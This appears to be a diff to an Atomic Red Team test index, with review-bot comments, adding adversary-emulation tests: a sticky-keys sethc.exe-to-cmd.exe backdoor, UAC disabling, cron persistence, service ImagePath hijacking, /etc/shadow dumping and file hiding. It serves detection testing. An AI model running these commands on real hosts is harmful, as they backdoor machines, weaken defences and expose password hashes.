@@ -354,6 +363,24 @@ privilege-escalation: } name: powershell elevation_required: true + - name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: 'Replace sticky keys binary (sethc.exe) with cmd.exe + +' + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + +' + name: command_prompt + elevation_required: true T1546.009: technique: external_references: @@ -1435,10 +1462,11 @@ privilege-escalation: elevation_required: true - name: Bypass UAC using sdclt DelegateExecute auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - description: "Bypasses User Account Control using a fileless method, registry - only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference - - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted - from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n" + description: | + Bypasses User Account Control using a fileless method, registry only. + Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe + [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) + Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) supported_platforms: - windows input_arguments: 
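Review bot: The cleanup_command of "Replace binary of sticky keys" only copies sethc_backup.exe back over sethc.exe; the ownership moved to Administrators by `takeown ... /A` and the `Administrators:F` entry added by `icacls` stay in place, and the backup copy is left in System32, so the host ends the test with weaker protection on an accessibility binary than it started with. Cleanup should restore owner and DACL and remove the backup, for example `icacls C:\Windows\System32\sethc.exe /setowner "NT SERVICE\TrustedInstaller"` together with an `icacls ... /save` of the original DACL taken before the grant and `/restore` of it afterwards, plus `del C:\Windows\System32\sethc_backup.exe`. The `/t` on the icacls grant is a recurse switch and does nothing for a single file. The same test appears again in the persistence section at `@@ -8482,6 +8611,24 @@` and needs the same change.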
@@ -1457,6 +1485,24 @@ privilege-escalation: ' name: powershell + - name: Disable UAC using reg.exe + auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + description: | + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key + HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + supported_platforms: + - windows + executor: + command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 1 /f + +' + name: command_prompt + elevation_required: true T1574.012: technique: external_references: @@ -2097,11 +2143,12 @@ privilege-escalation: cleanup_command: 'crontab /tmp/notevil ' - - name: Cron - Add script to cron folder + - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to a cron folder configured to execute - on a schedule. This technique was used by the threat actor Rocke during the - exploitation of Linux web servers. + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. ' supported_platforms: 
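Review bot: The cleanup_command of "Disable UAC using reg.exe" writes EnableLUA back to 1 unconditionally instead of restoring the value that was present before the test, so on a host where UAC was already off the cleanup itself changes the machine's configuration; reading the prior value with `reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA` before the change, or at least stating in the description that cleanup forces the value to 1, would make this explicit. The description should also mention that a change to EnableLUA takes effect only after a reboot, so the observable effect during the test is the registry write itself, which is what detections for this technique key on. There is a typo in the description as well: `Disable User Account Control (UAC) using the builtin tool reg.exe by changing its registry key`. The `@@ -2097,11 +2143,12 @@` hunk sharing this line is a rename and description rewrite only.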
@@ -2119,10 +2166,41 @@ privilege-escalation: executor: elevation_required: true name: bash - command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. ' - cleanup_command: 'rm /etc/cron.daily/#{cron_script_name} + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} ' T1574.001: 
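Review bot: The description of the new "Cron - Add script to /var/spool/cron/crontabs/ folder" test says the script is "configured to execute on a schedule", but files in that directory are per-user crontabs named after a user and parsed as crontab lines, and the command appends the bare `#{command}` (by default `echo 'Hello from Atomic Red Team' > /tmp/atomic.log`) without any schedule fields, so what the test actually exercises is a file write into the spool directory; the description should say so, because someone validating detections will otherwise expect execution telemetry that never appears. Because the command appends with `>>`, the cleanup `rm /var/spool/cron/crontabs/#{cron_script_name}` removes the whole file and would destroy a genuine crontab if `cron_script_name` ever matched an existing user, so cleanup should only remove a file the test created. The path is distribution-specific (Debian-derived systems use `/var/spool/cron/crontabs`, RHEL-derived ones `/var/spool/cron`), and a prereq that checks the directory exists would avoid a silent failure. The same caveat applies to the four `echo "#{command}" > /etc/cron.*/#{cron_script_name}` lines, which create files without the execute bit and therefore produce a file write but no scheduled execution. Both tests are duplicated in the persistence section at `@@ -10794,10 +10942,41 @@`.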
@@ -6767,9 +6845,9 @@ privilege-escalation: atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: "Service registry permissions weakness check and then which can - lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" - /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n" + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows input_arguments: 
@@ -6782,6 +6860,48 @@ privilege-escalation: get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt T1548.001: technique: external_references: 
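Review bot: The cleanup_command of "Service ImagePath Change with reg.exe" is `sc.exe delete #{weak_service_name}`, but the prereq passes whenever a service of that name already exists, so on a host where `#{weak_service_name}` is a real service the cleanup deletes it rather than undoing the ImagePath change; cleanup should first restore the path, `reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{weak_service_path}"`, and the description should state that the service is deleted afterwards so that only the default test-created service is safe to use. The description also has a typo: `Change Service registry ImagePath of a benign service to a malicious file`. The input arguments use `type: String` while the cron tests in this same diff use lower-case `string`; one spelling should be used throughout. `prereq_command` would avoid an error message on the expected missing-service path with `Get-Service #{weak_service_name} -ErrorAction SilentlyContinue`.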
@@ -8465,14 +8585,23 @@ persistence: type: Path default: C:\windows\system32\cmd.exe executor: - command: "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value - = \"#{attached_process}\"\nForeach ($item in $input_table){ \n $item - = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows - NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path - $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty - -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n - \ }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value - $Value\n }\n}\n" + command: | + $input_table = "#{parent_list}".split(",") + $Name = "Debugger" + $Value = "#{attached_process}" + Foreach ($item in $input_table){ + $item = $item.trim() + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } cleanup_command: | $input_table = "#{parent_list}".split(",") Foreach ($item in $input_table) 
@@ -8482,6 +8611,24 @@ persistence: } name: powershell elevation_required: true + - name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: 'Replace sticky keys binary (sethc.exe) with cmd.exe + +' + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + +' + name: command_prompt + elevation_required: true T1098: technique: object_marking_refs: @@ -10772,11 +10919,12 @@ persistence: cleanup_command: 'crontab /tmp/notevil ' - - name: Cron - Add script to cron folder + - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to a cron folder configured to execute - on a schedule. This technique was used by the threat actor Rocke during the - exploitation of Linux web servers. + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. ' supported_platforms: 
@@ -10794,10 +10942,41 @@ persistence: executor: elevation_required: true name: bash - command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. ' - cleanup_command: 'rm /etc/cron.daily/#{cron_script_name} + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} ' T1574.001: 
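Review bot: The cleanup_command of the rewritten 'Cron - Add script to all cron subfolders' test uses plain `rm` four times, so when any of /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly or /etc/cron.weekly is missing on the host (the generated markdown later in this patch lists macOS as supported, where these directories are not present by default) the first failing `rm` aborts cleanup and the remaining scripts stay behind; `rm -f` on each line makes cleanup idempotent. In the new 'Cron - Add script to /var/spool/cron/crontabs/ folder' test the command appends with `>>` while the cleanup deletes the whole file with `rm`, so a `cron_script_name` that matches an existing user's crontab would be destroyed rather than reverted; either write with `>` and refuse to run when the file already exists, or remove only the line that was appended. The default `command` value is a shell command rather than a crontab entry with schedule fields, and that directory is the per-user spool only on Debian-style systems (RHEL-family systems use /var/spool/cron), so the description's claim that the file is 'configured to execute on a schedule' should be hedged or the test's inputs constrained. The same hunk is repeated under the execution section at @@ -43263,10 +43676,41 @@.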
@@ -11579,7 +11758,51 @@ persistence: - Daniel Oakley - Travis Smith, Tripwire x_mitre_version: '2.1' - atomic_tests: [] + identifier: T1133 + atomic_tests: + - name: Running Chrome VPN Extensions via the Registry 2 vpn extension + auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 + description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, + please see "T1133\src\list of vpn extension.txt" to view complete list + +' + supported_platforms: + - windows + input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + +' + dependency_executor_name: powershell + dependencies: + - description: 'chrome must be installed + +' + prereq_command: if (cmd /c "chrome 2>nul") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + executor: + name: powershell + elevation_required: true + command: | + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} + Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: |- + 
$extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} T1574: technique: external_references: @@ -15405,9 +15628,9 @@ persistence: atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: "Service registry permissions weakness check and then which can - lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" - /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n" + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows input_arguments: 
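Review bot: The prereq_command `if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}` in the new 'Running Chrome VPN Extensions via the Registry' test does not check what the executor relies on: the command later starts `C:\Program Files (x86)\Google\Chrome\Application\chrome.exe` by absolute path, whereas the check only succeeds when a `chrome` command resolves on PATH (and launches it if so), so it can fail on a host where the test would run and pass on one where it would not. A path-based check matches the executor, `if (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe") {exit 0} else {exit 1}`. The get_prereq_command downloads ChromeStandaloneSetup64.exe from `#{chrome_url}` and runs it silently with no integrity check, and the cleanup removes only the registry keys, never the browser the prerequisite installed; both facts belong in the dependency description so operators know the test installs software it does not remove. The same hunk is repeated under initial-access at @@ -54456,7 +54900,51 @@.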
@@ -15420,6 +15643,48 @@ persistence: get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt T1547.009: technique: external_references: 
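Review bot: The cleanup_command `sc.exe delete #{weak_service_name}` in the new 'Service ImagePath Change with reg.exe' test deletes the service rather than undoing the change the test made; if an operator points `weak_service_name` at a service that already existed (which the test's own description presents as the intended target, and the prereq check only verifies presence), cleanup removes that service instead of restoring its ImagePath. Restore first, `reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{weak_service_path}"`, and only delete when get_prereq_command created the service, which the test currently cannot tell apart and should therefore document. The prereq_command `if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}` prints an error when the service is absent; `Get-Service #{weak_service_name} -ErrorAction SilentlyContinue` gives the same result quietly. The description has a typo, `bengin` for `benign`. The same test is added under defense-evasion at @@ -33772,6 +34094,48 @@.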
@@ -16777,7 +17042,45 @@ credential-access: x_mitre_is_subtechnique: true x_mitre_platforms: - Linux - atomic_tests: [] + identifier: T1003.008 + atomic_tests: + - name: Access /etc/shadow (Local) + auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 + description: "/etc/shadow file is accessed in Linux environments\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.008.txt" + executor: + command: | + sudo cat /etc/shadow > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} + +' + name: bash + elevation_required: true + - name: Access /etc/passwd (Local) + auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d + description: "/etc/passwd file is accessed in Linux environments\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.008.txt" + executor: + command: | + cat /etc/passwd > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} + +' + name: sh T1552.003: technique: external_references: 
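Review bot: In the new 'Access /etc/shadow (Local)' test the command `sudo cat /etc/shadow > #{output_file}` creates /tmp/T1003.008.txt under the invoking shell's default umask, so a copy of the system's password hashes typically sits world-readable in /tmp from execution until cleanup_command runs. Creating the file with restrictive permissions avoids that exposure, e.g. `umask 077; sudo cat /etc/shadow > #{output_file}`; the redirect is performed by the unprivileged shell, so the file stays readable to the user running the test and the following `cat #{output_file}` still works. Both new tests default `output_file` to the same path, so running them back-to-back silently overwrites the first result; distinct defaults would keep the captured outputs apart. The second test uses `name: sh` while the first uses `name: bash`; unifying the executor would be consistent with the rest of the index.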
@@ -22120,10 +22423,11 @@ defense-evasion: elevation_required: true - name: Bypass UAC using sdclt DelegateExecute auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - description: "Bypasses User Account Control using a fileless method, registry - only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference - - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted - from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n" + description: | + Bypasses User Account Control using a fileless method, registry only. + Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe + [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) + Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) supported_platforms: - windows input_arguments: @@ -22142,6 +22446,24 @@ defense-evasion: ' name: powershell + - name: Disable UAC using reg.exe + auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + description: | + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key + HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + supported_platforms: + - windows + executor: + command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + /v EnableLUA /t REG_DWORD /d 1 /f + +' + name: command_prompt + elevation_required: true T1218.003: technique: external_references: 
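Review bot: The cleanup_command of the new 'Disable UAC using reg.exe' test unconditionally writes EnableLUA back to 1, which restores the default rather than the host's prior state: on a machine where the value was already 0 before the test, cleanup silently turns UAC on. Recording the existing value before the change (`reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA`) and restoring that, or at least stating the assumption in the description, would make cleanup faithful. The description should also say that a change to EnableLUA only takes effect after a reboot, so neither the test's effect nor the cleanup's restore is observable from the running session; that matters for anyone validating detections against this atomic. `Conrol` in the description is a typo for `Control`.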
@@ -33757,9 +34079,9 @@ defense-evasion: atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: "Service registry permissions weakness check and then which can - lead to privilege escalation with ImagePath. eg. \nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" - /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n" + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows input_arguments: 
@@ -33772,6 +34094,48 @@ defense-evasion: get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt T1548.001: technique: external_references: @@ -34092,7 +34456,7 @@ defense-evasion: executor: name: command_prompt elevation_required: false - command: '#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}" + command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ' T1216: 
@@ -36216,6 +36580,40 @@ defense-evasion: ' name: command_prompt + - name: attrib - hide file + auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c + description: | + Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that + the victim does not see the file. + supported_platforms: + - windows + input_arguments: + file_or_folder: + description: Path of the file or folder remove attribute. + type: path + default: "%temp%\\T1222.001_attrib_2" + dependency_executor_name: command_prompt + dependencies: + - description: 'Test requires a file to modify to be located at (#{file_or_folder}) + +' + prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) + +' + get_prereq_command: | + mkdir #{file_or_folder} + echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt + echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt + executor: + command: | + attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt + attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt + cleanup_command: | + attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt + attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt + del #{file_or_folder}\T1222.001_attrib*.txt + rmdir #{file_or_folder} + name: command_prompt - name: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 description: Invokes the command line used by Ryuk Ransomware to grant full @@ -39327,6 +39725,7 @@ discovery: net localgroup net group /domain net group "domain admins" /domain + net group "enterprise admins" /domain name: command_prompt - name: Permission Groups Discovery PowerShell (Domain) auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 
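Review bot: The `file_or_folder` input in the new 'attrib - hide file' test is described as `Path of the file or folder remove attribute.`, which reads as carried over from the remove-attribute test and contradicts what this test does (the command sets `+h`); `Path of the folder holding the files to hide.` would match the commands, which operate on two files inside the path rather than on the path itself. The prereq_command, executor and cleanup all use `#{file_or_folder}` unquoted with a default of `%temp%\T1222.001_attrib_2`, so a profile path containing a space breaks `IF EXIST` and the attrib calls; quoting, e.g. `IF EXIST "#{file_or_folder}" ( EXIT 0 ) ELSE ( EXIT 1 )`, avoids that. The default name ending in `_attrib_2` looks shared with a neighbouring test; if it is, one test's cleanup `rmdir #{file_or_folder}` removes the other's prerequisite, which is worth confirming before merge.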
@@ -42107,6 +42506,19 @@ discovery: executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt + - name: Qakbot Recon + auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b + description: A list of commands known to be performed by Qakbot for recon purposes + supported_platforms: + - windows + input_arguments: + recon_commands: + description: File that houses list of commands to be executed + type: Path + default: PathToAtomicsFolder\T1016\src\qakbot.bat + executor: + command: "#{recon_commands}\n" + name: command_prompt T1049: technique: object_marking_refs: @@ -43241,11 +43653,12 @@ execution: cleanup_command: 'crontab /tmp/notevil ' - - name: Cron - Add script to cron folder + - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to a cron folder configured to execute - on a schedule. This technique was used by the threat actor Rocke during the - exploitation of Linux web servers. + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. ' supported_platforms: 
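Review bot: The new 'Qakbot Recon' test executes `#{recon_commands}` (defaulting to `PathToAtomicsFolder\T1016\src\qakbot.bat`) with no dependency that the batch file exists and no description of what it does, so a missing or edited file fails opaquely and a reviewer cannot tell from the index what telemetry to expect. Add a dependency with `dependency_executor_name: command_prompt` and `prereq_command: IF EXIST "#{recon_commands}" ( EXIT 0 ) ELSE ( EXIT 1 )`, and summarise in the description which commands the batch file runs. The path is also unquoted in `command: "#{recon_commands}\n"`, so a PathToAtomicsFolder containing spaces breaks the test; `command: "\"#{recon_commands}\"\n"` fixes that.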
